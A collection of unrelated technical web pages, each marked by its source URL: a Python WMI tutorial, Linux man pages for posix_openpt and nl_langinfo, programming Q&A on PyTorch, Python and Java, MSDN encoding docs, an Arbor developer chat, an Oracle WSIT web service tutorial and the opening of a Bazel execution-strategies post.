This is the second most common need and is fairly straightforward, but with a few caveats. The first is that, no matter how hard you try to obfuscate, you can't connect to your local computer this way. The second is that this technique doesn't always play well with the many layers of WMI security. More on that below in troubleshooting. To connect to a machine called "MachineB" with username "fred" and password "secret":

import wmi
c = wmi.WMI("MachineB", user=r"MachineB\fred", password="secret")

WMI classes are organised into a namespace hierarchy. The majority of the useful ones are under the cimv2 namespace, which is the default.
But add-on providers may supply extra namespaces, for example MicrosoftIISv2 or DEFAULT/StdRegProv. To use a different namespace from the default (which is, incidentally, not the one named default!) specify it via the namespace parameter. All namespaces are assumed to start from root so it need not be specified, although if you want to specify the root namespace itself, you can do:

import wmi
c = wmi.WMI(namespace="WMI")

In some cases you want to be able to pass the full moniker along, either because the moniker itself is so complex, or because you want to be able to cut-and-paste from elsewhere. In that case, pass the moniker as a string via the "moniker" parameter:

import wmi
c = wmi.WMI(
    moniker="winmgmts:{impersonationLevel=impersonate,(LockMemory, !IncreaseQuota)}"
)

A special case of the full moniker is that it can be used to connect directly to a WMI class or even a specific object. The Python module will notice that the moniker refers to a class or object and will return the wrapped object directly rather than a namespace. Any WMI object's path can be used as a moniker to recreate it, so to attach directly to the Win32_LogicalDisk class, for example:

import wmi
logical_disk = wmi.WMI(moniker="//./root/cimv2:Win32_LogicalDisk")

This is equivalent to getting hold of the class through the normal mechanism although it's mostly of use internally to the module and when translating examples which use the technique. Access to a specific object is similar and slightly more useful:

import wmi
c_drive = wmi.WMI(moniker='//./root/cimv2:Win32_LogicalDisk.DeviceID="C:"')

This object is the same as you'd have received by querying against the Win32_LogicalDisk in the cimv2 namespace with a parameter of DeviceID="C:" so from the point of view of the Python module is not so very useful. However it is a fairly common usage in VBS examples on the web and eases translation a little.

We've already seen this in action above; I just didn't comment on it at the time.
When you "call" a WMI class, you can pass along simple equal-to parameters to narrow down the list. This filtering is happening at the WMI level; you can still do whatever post-hoc filtering you want in Python once you've got the values back. Note that, even if the resulting list is only one element long, it is still a list. To find all fixed disks:

import wmi
c = wmi.WMI()
for disk in c.Win32_LogicalDisk(DriveType=3):
    print disk

By default, all fields in the class will be returned. For reasons of performance or simply manageability, you may want to specify that only certain fields be returned by the query. This is done by setting the first positional parameter to a list of field names. Note that the key field (typically an id or a unique name or even a combination) will always be returned:

import wmi
c = wmi.WMI()
for disk in c.Win32_LogicalDisk(["Caption", "Description"], DriveType=3):
    print disk

If you want to carry out arbitrary WMI queries, using its pseudo-SQL language WQL, you can use the .query method of the namespace. To list all non-fixed disks, for example:

import wmi
c = wmi.WMI()
wql = "SELECT Caption, Description FROM Win32_LogicalDisk WHERE DriveType <> 3"
for disk in c.query(wql):
    print disk

Intrinsic events occur when you hook into a general event mechanism offered by the WMI system to poll other classes on your behalf. You can track the creation, modification or deletion of any WMI class. You have to specify the type of event (creation, deletion, modification or simply operation to catch any type) and give a polling frequency in whole seconds. After those parameters, you can pass along keyword parameters in the normal way to narrow down the events returned. Note that, since this is polling behind the scenes, you do not want to use this to, say, monitor an entire directory structure.
To watch an event log for errors, say:

import wmi
c = wmi.WMI(privileges=["Security"])
watcher = c.Win32_NTLogEvent.watch_for("creation", 2, Type="error")
while 1:
    error = watcher()
    print "Error in %s log: %s" % (error.Logfile, error.Message)
    # send mail to sysadmin etc.

A caveat here: this is polling, and at the frequency you've specified. It is possible to miss events this way.

The return from a watcher is in fact a special _wmi_event object, subclass of a conventional _wmi_object, and which includes, for intrinsic events, the event type, timestamp and previous value for a modification as attributes: _wmi_event.event_type, _wmi_event.timestamp and _wmi_event.previous respectively.

Note that, while "Win32_NTLogEvent" ends in "Event", it is not in fact an extrinsic event. You can tell which classes are extrinsic events by examining their derivation and looking for __ExtrinsicEvent:

import wmi
c = wmi.WMI()
print c.Win32_PowerManagementEvent.derivation()

Alternatively, you can go top down and look for subclasses of __ExtrinsicEvent:

import wmi
c = wmi.WMI()
for i in c.subclasses_of("__ExtrinsicEvent"):
    print i

You use extrinsic events in much the same way as intrinsic ones. The difference is that any event type and delay are ignored since WMI isn't polling on your behalf, but waiting on the underlying subsystem. The return from the watcher is still a _wmi_event object (1.3.1) but without the extra information, which isn't supplied by WMI. Suppose you wanted to do something whenever your computer came out of standby, eg to notify an IM group of your presence:

import wmi
import datetime

c = wmi.WMI()
watcher = c.Win32_PowerManagementEvent.watch_for(EventType=7)
while True:
    event = watcher()
    print "resumed"
    #
    # Number of 100-ns intervals since 1st Jan 1601!
    # TIME_CREATED doesn't seem to be provided on Win2K
    #
    if hasattr(event, "TIME_CREATED"):
        ns100 = int(event.TIME_CREATED)
        offset = datetime.timedelta(microseconds=ns100 / 10)
        base = datetime.datetime(1601, 1, 1)
        print "Resumed at", base + offset

For an intrinsic modification event, you could compare the before and after values of the trigger instance:

import wmi
c = wmi.WMI()
watcher = c.Win32_Process.watch_for("modification")
event = watcher()
print "Modification occurred at", event.timestamp
print event.path()
prev = event.previous
curr = event
for p in prev.properties:
    pprev = getattr(prev, p)
    pcurr = getattr(curr, p)
    if pprev != pcurr:
        print p
        print "  Previous:", pprev
        print "  Current:", pcurr

But there's more! Although you can use these watchers inside threads (of which more below) it might be easier in some cases to poll them with a timeout. If, for example, you wanted to monitor event log entries on two boxes without getting into threading and queues:

import wmi

def wmi_connection(server, username, password):
    print "attempting connection with", server
    if username:
        return wmi.WMI(server, user=username, password=password)
    else:
        return wmi.WMI(server)

servers = [
    (".", "", ""),
    ("goyle", "wmiuser", "secret")
]
watchers = {}
for server, username, password in servers:
    connection = wmi_connection(server, username, password)
    watchers[server] = connection.Win32_PrintJob.watch_for("creation")

while True:
    for server, watcher in watchers.items():
        try:
            event = watcher(timeout_ms=10)
        except wmi.x_wmi_timed_out:
            pass
        else:
            print "print job added on", server
            print event

If you examine the keys of the .methods dictionary which every wrapped WMI class uses to cache its wrapped methods, you will see what methods are exposed:

import wmi
c = wmi.WMI()
c.Win32_ComputerSystem.methods.keys()

Each wrapped method produces its function signature as its repr or str.
If a function such as .Shutdown requires additional privileges, this is also indicated:

import wmi
c = wmi.WMI()
os = c.Win32_OperatingSystem
for method_name in os.methods:
    method = getattr(os, method_name)
    print method

Note that if a parameter is expected to be a list it will be suffixed with "[]". Note also that the return values are always a tuple, albeit of length one.

I was a bit surprised to come across this myself, but WMI tells you which Win32 API call is going on under the covers when you call a WMI method (not, unfortunately, for a property). This is exposed as a function wrapper's .provenance attribute:

import wmi
c = wmi.WMI()
print c.Win32_Process.Create.provenance

WMI exposes a SpawnInstance_ method which is wrapped as the _wmi_object.new() method of the Python WMI classes. But you'll use this method far less often than you think. If you want to create a new disk share, for example, rather than using Win32_Share.new, you'll actually call the Win32_Share class's Create method. In fact, most of the classes which allow instance creation via WMI offer a Create method (Win32_Process, Win32_Share etc.):

import wmi
c = wmi.WMI()
result, = c.Win32_Share.Create(Path="c:\\temp", Name="temp", Type=0)
if result == 0:
    print "Share created successfully"
else:
    raise RuntimeError, "Problem creating share: %d" % result

The times you will need to spawn a new instance are when you need to feed one WMI object with another created on the fly. Typical examples are passing security descriptors to new objects or process startup information to a new process.
This example from MSDN can be translated into Python as follows:

import wmi

SW_SHOWNORMAL = 1

c = wmi.WMI()
process_startup = c.Win32_ProcessStartup.new()
process_startup.ShowWindow = SW_SHOWNORMAL
#
# could also be done:
# process_startup = c.Win32_ProcessStartup.new(ShowWindow=win32con.SW_SHOWNORMAL)
#
process_id, result = c.Win32_Process.Create(
    CommandLine="notepad.exe",
    ProcessStartupInformation=process_startup
)
if result == 0:
    print "Process started successfully: %d" % process_id
else:
    raise RuntimeError, "Problem creating process: %d" % result

Each class and object will return a readable version of its structure when rendered as a string:

import wmi
c = wmi.WMI()
print c.Win32_OperatingSystem
for os in c.Win32_OperatingSystem():
    print os

WMI objects occur within a hierarchy of classes. Each object knows its own ancestors:

import wmi
c = wmi.WMI()
print c.Win32_Process.derivation()

You can also look down the tree by finding all the subclasses of a named class, optionally filtering via a regex. To find all extrinsic event classes other than the builtin ones (indicated by a leading underscore):

import wmi
c = wmi.WMI()
for extrinsic_event in c.subclasses_of("__ExtrinsicEvent", "[^_].*"):
    print extrinsic_event
    print "  ", " < ".join(getattr(c, extrinsic_event).derivation())

The _wmi_object.__eq__() operator is overridden in wrapped WMI classes and calls the underlying .CompareTo method, so comparing two WMI objects for equality should do The Right Thing.

Associators are classes which link together other classes.
If, for example, you want to know what groups are on your system, and which users are in each group:

import wmi
c = wmi.WMI()
for group in c.Win32_Group():
    print group.Caption
    for user in group.associators(wmi_result_class="Win32_UserAccount"):
        print "  ", user.Caption

which can also be written in terms of the associator classes:

import wmi
c = wmi.WMI()
for group in c.Win32_Group():
    print group.Caption
    for user in group.associators("Win32_GroupUser"):
        print "  ", user.Caption

New in version 1.3.1: The _wmi_object.associators() method will convert its results to a _wmi_object.

Thanks to a useful collaboration last summer with Paul Tiemann, the module was able to speed things up considerably if needed with a combination of caching and lightweight calls where needed. Not all of that is covered here, but the most straightforward improvements combine removing runtime introspection and caching so that wrappers are generated only on demand and can be pre-cached.

The focus of the module originally, and still a large part of its use today, is in the interpreter. For that reason, when you instantiate a WMI namespace it looks for all the classes available in that namespace. But this takes quite a while on the larger namespaces and is unnecessary even on the smaller ones once you know what you're after. In production code, therefore, you can turn this off:

import wmi
c = wmi.WMI(find_classes=False)

If you need to determine which classes are available, you can still use the subclasses_of functionality described above to search, for example, for the performance classes available on a given machine at runtime:

import wmi
c = wmi.WMI(find_classes=False)
perf_classes = c.subclasses_of("Win32_PerfRawData")

Note: From v1.4 onwards, the find_classes parameter is False by default: it has to be turned on specifically. But...
the classes attribute now does a lazy lookup, so if you do call it directly or indirectly, eg by using IPython which invokes its attribute lookup magic method _wmi_object._getAttributes(), it will return the full list of classes in the namespace.

To avoid an initial lookup hit when a class is first queried or its method first called, it's possible to push the class into the cache beforehand simply by referring to it. So, extending the code above:

import wmi
c = wmi.WMI(find_classes=False)
for perf_class in c.subclasses_of("Win32_PerfRawData"):
    # do nothing, just get it into the cache
    getattr(c, perf_class)

By default a WMI query will return all the fields of a class in each instance. By specifying the fields you're interested in up-front as the first parameter of the query, you'll avoid any expensive lookups. Although many fields represent static or cheap data, a few are calculated on the fly. This is especially true for performance or other realtime data in classes such as Win32_Process:

import wmi
c = wmi.WMI(find_classes=False)
for i in c.Win32_Process(["Caption", "ProcessID"]):
    print i

This is going to be a small section at the moment, more of a heads-up until I have a few more firm facts at my disposal. In short, the simplest way by far to access WMI functionality is to run as a Domain Admin user on an NT/AD domain. Other techniques are certainly possible, but if they stall at any point, you're left ploughing through at least three layers of security, prodding hopefully at each one until you get a result or give up in disgust.

The user in question has to have some kind of access to the machine whose WMI functionality is being invoked. This might either be by virtue of being included in the local Admin group or by specific access granted to a named user.

WMI is a DCOM-based technology and so whatever rules apply to DCOM connections apply to WMI.
If there's a problem authenticating at the DCOM level then, in theory, you ought to have the same problem doing a DispatchEx on Word.Application. The program you want to look at is dcomcnfg.exe and that's all I'll say for now.

WMI namespaces are system objects with their own ACLs. If you go to the WMI MMC snap-in (accessed via the Manage Computer interface) and access the properties for a namespace, there will be a security tab. The account using WMI functionality on the machine needs to have sufficient access via this security.

WMI is a COM/DCOM-based mechanism so the rules which apply to COM threading apply to WMI as well. This is true whether or not your program explicitly invokes Python threading: if you're running in a service, for example, you're probably threading whether you like it or not, since the service control manager seems to run the service control code in a different thread from the main service. Any COM code which wants to use threading must specify a threading model. There is much said out there on the subject but unless you have specific requirements you can normally get away with initializing COM threading before you instantiate a WMI object within a thread and then uninitializing afterwards:

import pythoncom
import threading
import wmi

class Info(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        pythoncom.CoInitialize()
        try:
            c = wmi.WMI()
            for i in c.Win32_Process():
                print i.Caption
        finally:
            pythoncom.CoUninitialize()

New in version 1.4.1: From v1.4 onwards, the Moniker Syntax Error which usually results from failing to initialise threaded WMI access will be caught by the underlying code and an x_wmi_uninitialised_thread exception will be raised instead.

See also: Translations, Authoritative Links, Useful Examples, Lists, Groups, etc.
http://svn.timgolden.me.uk/wmi/trunk/docs/_build/tutorial.html
NAME

posix_openpt - open a pseudoterminal device

SYNOPSIS

#include <stdlib.h>
#include <fcntl.h>

int posix_openpt(int flags);

Feature Test Macro Requirements for glibc (see feature_test_macros(7)):

posix_openpt(): _XOPEN_SOURCE >= 600

DESCRIPTION

The posix_openpt() function opens an unused pseudoterminal master device, returning a file descriptor that can be used to refer to that device.

The flags argument is a bit mask that ORs together zero or more of the following flags:

O_RDWR
    Open the device for both reading and writing. It is usual to specify this flag.

O_NOCTTY
    Do not make this device the controlling terminal for the process.

RETURN VALUE

On success, posix_openpt() returns a nonnegative file descriptor which is the lowest numbered unused file descriptor. On failure, -1 is returned, and errno is set to indicate the error.

ERRORS

See open(2).

VERSIONS

Glibc support for posix_openpt() has been provided since version 2.2.1.

ATTRIBUTES

For an explanation of the terms used in this section, see attributes(7).

CONFORMING TO

POSIX.1-2001, POSIX.1-2008.

posix_openpt() is part of the UNIX 98 pseudoterminal support (see pts(4)).

NOTES

Some older UNIX implementations that support System V (aka UNIX 98) pseudoterminals don't have this function, but it can be easily implemented by opening the pseudoterminal multiplexor device:

int
posix_openpt(int flags)
{
    return open("/dev/ptmx", flags);
}
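As an aside, the closest Python stdlib analogue to this interface (not part of the man page itself) is os.openpty(), which on Linux goes through the same /dev/ptmx pseudoterminal machinery described above. A rough sketch of exercising a master/slave pair:

```python
import os

# Open a pseudoterminal master/slave pair. On glibc-based systems this
# uses the same /dev/ptmx multiplexor device that posix_openpt() opens.
master_fd, slave_fd = os.openpty()
slave_name = os.ttyname(slave_fd)    # e.g. "/dev/pts/3"

# Bytes written to the slave end appear on the master end.
os.write(slave_fd, b"hi")
data = os.read(master_fd, 2)

print(slave_name, data)              # prints the pty name and b'hi'

os.close(master_fd)
os.close(slave_fd)
```

This only works on Unix-like systems, and the exact device name will vary.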
https://manpages.debian.org/buster-backports/manpages-dev/posix_openpt.3.en.html
I'm running the code:

import torch

te_y = torch.ones([1, 4, 10])                  # torch.Size([1, 4, 10])
operator = torch.tensor([[[1.0, -2.0, 1.0]]])  # torch.Size([1, 1, 3])
torch.nn.functional.conv1d(te_y, operator, padding=1, groups=4)

and I get this error:

Given groups=4, expected weight to be at least 4 at dimension 0, but got weight of size [1, 1, 3] instead

But as I read the docs, there should be no error. I want to perform the 1d conv on each of the 4 in_channels with the same weight by setting groups to 4.
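For what it's worth, a variant that does run — assuming the intent above is to apply the same three-tap kernel to each of the four channels independently — is to give the weight one output channel per group, e.g. by repeating the [1, 1, 3] kernel four times along dimension 0 (this is my reading of the grouped-convolution shape rules, not an official answer):

```python
import torch
import torch.nn.functional as F

te_y = torch.ones([1, 4, 10])                  # (batch, channels, length)
operator = torch.tensor([[[1.0, -2.0, 1.0]]])  # shape (1, 1, 3)

# With groups=4, conv1d expects weight of shape
# (out_channels, in_channels // groups, kernel_size) with out_channels
# divisible by groups, so replicate the kernel once per channel.
weight = operator.repeat(4, 1, 1)              # shape (4, 1, 3)

out = F.conv1d(te_y, weight, padding=1, groups=4)
print(out.shape)                               # torch.Size([1, 4, 10])
```

On an all-ones input, the interior outputs are 1 - 2 + 1 = 0 and the padded edges come out as -1, which is consistent with each channel being filtered separately.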
https://discuss.pytorch.org/t/exceptional-behavior-when-parameter-groups-is-not-equal-to-1/154406
I have a while loop, and I want it to keep running through for 15 minutes. It is currently:

while True:
    # blah blah blah

Try this:

import time

t_end = time.time() + 60 * 15
while time.time() < t_end:
    # do whatever you do

This will run for 15 min x 60 s = 900 seconds.

Function time.time returns the current time in seconds since 1st Jan 1970. The value is in floating point, so you can even use it with sub-second precision. In the beginning the value t_end is calculated to be "now" + 15 minutes. The loop will run until the current time exceeds this preset ending time.
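One caveat: time.time() follows the wall clock, so an NTP adjustment or a manual clock change mid-run can lengthen or shorten the loop. On Python 3.3+ you can use time.monotonic(), which never jumps. A sketch wrapping the same idea in a helper (the function name is just for illustration):

```python
import time

def run_for(seconds, body):
    """Call body() repeatedly until `seconds` of wall time have elapsed,
    measured with time.monotonic() so clock adjustments can't skew it."""
    t_end = time.monotonic() + seconds
    while time.monotonic() < t_end:
        body()

# e.g. run_for(15 * 60, do_whatever_you_do)
```

If the body is cheap, consider a short time.sleep() inside it so the loop doesn't spin at 100% CPU.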
https://codedump.io/share/9shXwOtWVBQW/1/python-loop-to-run-for-certain-amount-of-seconds
SYNOPSIS

#include <langinfo.h>

char *nl_langinfo(nl_item item);

DESCRIPTION

The nl_langinfo() function provides access to locale information in a more flexible way than localeconv(3) does. Individual elements of the locale categories can be queried. Examples of the usable items are:

CODESET (LC_CTYPE)
    Return a string with the name of the character encoding used in the selected locale, such as "UTF-8", "ISO-8859-1", or "ANSI_X3.4-1968" (better known as US-ASCII). For a list of character encoding names, try "locale -m", cf. locale(1).

D_T_FMT (LC_TIME)
    Return a string that can be used as a format string for strftime(3) to represent time and date in a locale-specific way.

D_FMT (LC_TIME)
    Return a string that can be used as a format string for strftime(3) to represent a date in a locale-specific way.

T_FMT (LC_TIME)
    Return a string that can be used as a format string for strftime(3) to represent a time in a locale-specific way.

DAY_{1-7} (LC_TIME)
    Return name of the n-th day of the week. [Warning: this follows the US convention DAY_1 = Sunday, not the international convention (ISO 8601) that Monday is the first day of the week.]

THOUSEP (LC_NUMERIC)
    Return separator character for thousands (groups of three digits).

CRNCYSTR (LC_MONETARY)
    Return currency symbol, preceded by "-" if the symbol should appear before the value, "+" if the symbol should appear after the value, or "." if the symbol should replace the radix character.

The above list covers just some examples of items that can be requested. For a more detailed list, consult The GNU C Library Reference Manual.

RETURN VALUE

If no locale has been selected by setlocale(3) for the appropriate category, nl_langinfo() returns a pointer to the corresponding string in the "C" locale.

CONFORMING TO

SUSv2, POSIX.1-2001.

SEE ALSO

locale(1), localeconv(3), setlocale(3), charsets(7), locale(7)

The GNU C Library Reference Manual

COLOPHON

This page is part of release 3.23 of the Linux man-pages project. A description of the project, and information about reporting bugs, can be found at.
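As an aside, the same items are reachable from Python's locale module (Unix only), which is a thin wrapper around this C function — a quick way to poke at the values described above:

```python
import locale

# Use the portable "C" locale so the results are predictable.
locale.setlocale(locale.LC_ALL, "C")

print(locale.nl_langinfo(locale.CODESET))    # character encoding name
print(locale.nl_langinfo(locale.D_T_FMT))    # strftime() date+time format
print(locale.nl_langinfo(locale.DAY_1))      # "Sunday" (US convention)
print(locale.nl_langinfo(locale.RADIXCHAR))  # "." in the C locale
```

The returned strings change with the locale selected via setlocale, mirroring the C behaviour.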
http://www.linux-directory.com/man3/nl_langinfo.shtml
Encoding::GetChars Method (array<Byte>^)

When overridden in a derived class, decodes all the bytes in the specified byte array into a set of characters.

Assembly: mscorlib (in mscorlib.dll)

Parameters

bytes
Type: array<System::Byte>^
The byte array containing the sequence of bytes to decode.

Return Value

Type: array<System::Char>^
A character array containing the results of decoding the specified sequence of bytes.

Note: This method is intended to operate on Unicode characters, not on arbitrary binary data, such as byte arrays. If you need to encode arbitrary binary data into text, use a protocol such as uuencode, which is implemented by methods such as Convert::ToBase64CharArray.

Your app might need to decode multiple input bytes from a code page and process the bytes using multiple calls. In this case, you probably need to maintain the decoding state between calls. If your app must convert a large amount of data, it should reuse the output buffer. In this case, the GetChars(array<Byte>^, Int32, Int32, array<Char>^, Int32) overload that supports output character arrays is a better choice.

using namespace System;
using namespace System::Text;

void PrintCountsAndChars( array<Byte>^bytes, Encoding^ enc );

int main()
{
   // Create UTF32Encoding instances for the big-endian and
   // little-endian byte orders, and a sample string to encode.
   UTF32Encoding^ u32BE = gcnew UTF32Encoding( true, true );
   UTF32Encoding^ u32LE = gcnew UTF32Encoding( false, true );
   String^ myStr = L"za\u0306\u01FD\u03B2";

   // Encode the string using the big-endian byte order.
   array<Byte>^barrBE = gcnew array<Byte>(u32BE->GetByteCount( myStr ));
   u32BE->GetBytes( myStr, 0, myStr->Length, barrBE, 0 );

   // Encode the string using the little-endian byte order.
   array<Byte>^barrLE = gcnew array<Byte>(u32LE->GetByteCount( myStr ));
   u32LE->GetBytes( myStr, 0, myStr->Length, barrLE, 0 );

   // Get the char counts and decode the byte arrays.
   PrintCountsAndChars( barrBE, u32BE );
   PrintCountsAndChars( barrLE, u32LE );
}

void PrintCountsAndChars( array<Byte>^bytes, Encoding^ enc )
{
   // Display the name of the encoding used.
   Console::Write( "{0,-25} :", enc );

   // Display the exact character count.
   int iCC = enc->GetCharCount( bytes );
   Console::Write( " {0,-3}", iCC );

   // Display the maximum character count.
   int iMCC = enc->GetMaxCharCount( bytes->Length );
   Console::Write( " {0,-3} :", iMCC );

   // Decode the bytes and display the characters.
   array<Char>^arrChars = enc->GetChars( bytes );
   Console::WriteLine( arrChars );
}

Version Information
Universal Windows Platform: Available since 8
.NET Framework: Available since 1.1
Portable Class Library: Supported in: portable .NET platforms
Silverlight: Available since 2.0
Windows Phone Silverlight: Available since 7.0
Windows Phone: Available since 8.1
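For comparison (not part of the original page): in Python, bytes.decode does the equivalent whole-buffer decode, and codecs.getincrementaldecoder covers the keep-state-between-calls case the remarks above warn about. A sketch using the same big-/little-endian UTF-32 idea:

```python
import codecs

s = "za\u0306\u01FD\u03B2"   # same sample characters as the C++ example

# Whole-buffer decode, like Encoding::GetChars(bytes).
be = s.encode("utf-32-be")
le = s.encode("utf-32-le")
assert be.decode("utf-32-be") == s
assert le.decode("utf-32-le") == s

# Decoding a stream in chunks: an incremental decoder keeps state
# across calls, so a code point split between chunks survives.
dec = codecs.getincrementaldecoder("utf-32-be")()
out = dec.decode(be[:5]) + dec.decode(be[5:], final=True)
assert out == s
```

The split at byte 5 deliberately lands mid-code-point; a naive per-chunk bytes.decode would raise there, which is exactly why the stateful variant exists.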
https://msdn.microsoft.com/en-us/library/khac988h.aspx?cs-save-lang=1&cs-lang=cpp
Welcome to the Arbor Community! What are you working on?

arbor.synapse('expsyn') but I cannot find a way. What I want is a small current input on the postsynaptic cell for each presynaptic spike, can anyone point me in the right direction? Thanks!

place a synapse and try to form a connection that ends on it?

mpi4py and it seems a bit overkill for unit tests to start with file locking etc if we can just pip install mpi4py

context is not readable from Python and the mpi_comm has no interface

def _build_cat(name, path):
    from mpi4py.MPI import COMM_WORLD as comm
    build_err = None
    try:
        if not comm.Get_rank():
            subprocess.run(["build-catalogue", name, str(path)], check=True)
        build_err = comm.bcast(build_err, root=0)
    except Exception as e:
        build_err = comm.bcast(e, root=0)
    if build_err:
        raise RuntimeError("Tests can't build catalogues")
    return Path.cwd() / (name + "-catalogue.so")

PSA: Once arbor-sim/arbor#1693 is merged all Python unit tests must follow the unittest naming conventions:

test_<my_test_file>.py
Test<MyTestCase>(unittest.TestCase):
test_<my_test_function>

It's important that test files start with test_, test cases start with Test and test functions with test_

doc/internals?

options.py can also be burned now, right? Or is there still a use case for CLI args in the tests, not covered by the unittest CLI itself?
https://gitter.im/arbor-sim/community
package objects;

public class Scanner {
    //class level variable
    static int paperCount = 1;

    //class level method
    static void Scan() {
        if (paperCount > 0) {
            paperCount = paperCount - 1;
            System.out.println("Document printed");
        } else {
            System.out.println("cartridge is out");
        }
    }

    //instance level method
    void scanDoc() {
        Scan();
    }
}

package objects;

public class ScannerTest {
    public static void main(String args[]) {
        Scanner p1 = new Scanner();
        Scanner p2 = new Scanner();
        // object level method
        p1.scanDoc();
        p2.scanDoc();
    }
}
so in order to understand JSP's you not only have to understand Java, but you have to understand HTML. With JSP's you are sort of writing code (java)... that writes its own code (HTML).... so obviously the developer must have a solid grasp of both technologies... or none of it will make any sense.

E.g. With code like this:

public void B() { }

public static void main() {
    A();
    B();
}

public void C() { }

public void A() {
    C();
}

You'd start with "main", see that it calls "A" - read that next. See that "A" calls C so read that next. Now you're done with C, so back to A. It doesn't call anything else, so back to "main". Next method in "main" is B, so read that next and so on. In this example you'd read the code in the order: "main" "A" "C" "B" (note this is very different from top to bottom or bottom to top). That way you are piecing together what the program does in the order it will do it. In this way you are reading the "story" of the code in the order it will run. Which is an order that should make sense. If you read top to bottom or anything else, it will be harder to understand as the code won't run in that order and may not make sense.

Hope that helps,
Doug

If your code is calling 3rd party jar classes/methods then you should be able to find Javadoc documentation for these that should explain in enough detail what the method is doing. If you encounter a method where there is no source code then you will just need to do your best to understand it from the docs (and what parameters it takes and returns, and its name) and then proceed with the rest of the program.

Doug

If you cannot find the documentation for a jar file, and you have no idea what its purpose is, then you probably shouldn't be using it anyway.
Some jar files are compiled to protect the author's source code. If you have legitimate access to the jar file, then you will be given or have available to you... the necessary documentation to use it correctly.

There's more on how to do that here:

But this should only be used when you really need to delve into the details of how a library works. For most libraries, you should be fine to just read the documentation and work with that alone (and ignore the source). If you aren't sure where these major entry points are, you should ask somebody else who is already familiar with the code to help you find them.

Doug

Since object oriented programming is all about creating objects and invoking their methods. For example: draw a picture as attached of the Rectangle class with class level variables and methods (something like an object interaction diagram showing how the objects communicate with each other, for let us say 10 of the objects in the application?). Draw two ellipses for scanner instances p1, p2 with instance level methods, and then join them to the other class's method wherever the call leads to? Please advise.
ObjectInstancDiagram.jpg

Sometimes drawing it out can help you get your head around it. I think as you gain experience in Java... that reviewing javadocs will provide enough information and confidence to use new java classes. The more complex classes usually include example usage... so that helps too.
https://www.experts-exchange.com/questions/28369114/How-to-read-a-java-program.html
The starting point for developing a web service to use WSIT is a Java class file annotated with the javax.jws.WebService annotation. The WebService annotation defines the class as a web service endpoint. The following Java code shows a web service. The IDE will create most of this Java code for you.

package org.me.calculator;

import javax.jws.WebService;
import javax.jws.WebMethod;
import javax.jws.WebParam;

@WebService()
public class Calculator {

    @WebMethod(action="sample_operation")
    public String operation(@WebParam(name="param_name") String param) {
        // implement the web service operation here
        return param;
    }

    @WebMethod(action="add")
    public int add(@WebParam(name = "i") int i, @WebParam(name = "j") int j) {
        int k = i + j;
        return k;
    }
}

Notice that this web service performs a very simple operation. It takes two integers, adds them, and returns the result. Perform the following steps to use the IDE to create this web service.

Click the Runtime tab in the left pane and verify that GlassFish is listed in the left pane. If it is not listed, register it by following the steps in Registering GlassFish with the IDE.

Choose File->New Project, select Web Application from the Web category, and click Next.

Assign the project a name that is representative of services that will be provided by the web service (for example, CalculatorApplication), set the Project Location to the location of the Sun application server, and click Finish.

When you create the web service project, be sure to define a Project Location that does not include spaces in the directory name. Spaces in the directory might cause the web service and web service clients to fail to build and deploy properly. To avoid this problem, Sun recommends that you create a directory, for example C:\work, and put your project there.

Right-click the CalculatorApplication node and choose New->Web Service.
Type the web service name (CalculatorWS) and the package name (org.me.calculator) in the Web Service Name and the Package fields respectively. Select Create an Empty Web Service and click Finish. The IDE then creates a skeleton CalculatorWS.java file for the web service that includes an empty WebService class with the annotation @WebService.

Right-click within the body of the class and choose Web Service->Add Operation.

In the upper part of the Add Operation dialog box, type add in Name and choose int from the Return Type drop-down list.

In the lower part of the Add Operation dialog box, click Add and create a parameter of type int named i. Click OK.

Click Add again and create a parameter of type int called j. Click OK and close the Enter Method Parameter dialog box.

Click OK at the bottom of the Add Operation dialog box. Notice that the add method has been added to the Source Editor:

@WebMethod
public int add(@WebParam(name = "i") int i, @WebParam(name = "j") int j) {
    // TODO implement operation
    return 0;
}

Change the add method to the following (changes are in bold):

@WebMethod(action="add")
public int add(@WebParam(name = "i") int i, @WebParam(name = "j") int j) {
    int k = i + j;
    return k;
}

To ensure interoperability with Windows Communication Foundation (WCF) clients, you must specify the action element of @WebMethod in your endpoint implementation classes. WCF clients will incorrectly generate an empty string for the Action header if you do not specify the action element.

Save the CalculatorWS.java file.
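As a quick smoke test of the deployed service, a client can POST a SOAP envelope that invokes the add operation. The sketch below (Python, for illustration) only builds the envelope; the target namespace http://calculator.me.org/ is what JAX-WS derives from the package name by default, and the endpoint URL in the comment is a placeholder — treat both as assumptions and check them against the generated WSDL.

```python
# Build a SOAP 1.1 envelope for the Calculator "add" operation.
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
CALC_NS = "http://calculator.me.org/"  # assumed JAX-WS default targetNamespace

def build_add_envelope(i: int, j: int) -> str:
    """Return the XML that invokes add(i, j) on the CalculatorWS endpoint."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<S:Envelope xmlns:S="{SOAP_NS}"><S:Body>'
        f'<ns2:add xmlns:ns2="{CALC_NS}">'
        f'<i>{i}</i><j>{j}</j>'
        '</ns2:add></S:Body></S:Envelope>'
    )

print(build_add_envelope(2, 3))

# Sending it (the URL below is a placeholder -- adjust to your deployment):
# import urllib.request
# req = urllib.request.Request(
#     "http://localhost:8080/CalculatorApplication/CalculatorWS",
#     data=build_add_envelope(2, 3).encode("utf-8"),
#     headers={"Content-Type": "text/xml; charset=utf-8",
#              "SOAPAction": '"add"'})
# print(urllib.request.urlopen(req).read().decode("utf-8"))
```

The response, if the namespace and URL are right, should carry an addResponse element containing 5.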
http://docs.oracle.com/cd/E19159-01/820-1072/ahibp/index.html
“Strategies? Will you talk about Bazel’s strategy for world domination 🙀?” No… not exactly that. Dynamic execution has been quite a hot topic in my work over the last few months and I am getting ready to publish a series of posts on it soon. But before I do that, I need to first review Bazel’s execution strategies because they play a big role in understanding what dynamic execution is and how it’s implemented. Simply put, strategies are Bazel’s abstraction over the mechanism to run a subprocess as part of an action (think compiler invocation). In essence, they are a glorified exec() system call in Unix or CreateProcess in Windows and supercharge them to run subprocesses under very different environments. The invariant, however, is that strategies do not affect the semantics of the execution: that is, running the same command line on strategy A and strategy B must yield the same output files. As a consequence, changing strategies does not invalidate the analysis graph. Because of the previous invariant, we can mix and match strategies at run time without affecting the output behavior. This is exposed via the repeated --strategy flag, which takes arguments of the form [mnemonic]=strategy. With this flag, you can tell Bazel to run certain classes of actions under a specific strategy. For example, you might say --strategy=remote --strategy=Javac=worker to set the default strategy to remote and to override it with worker for Java compiles alone. There also is the 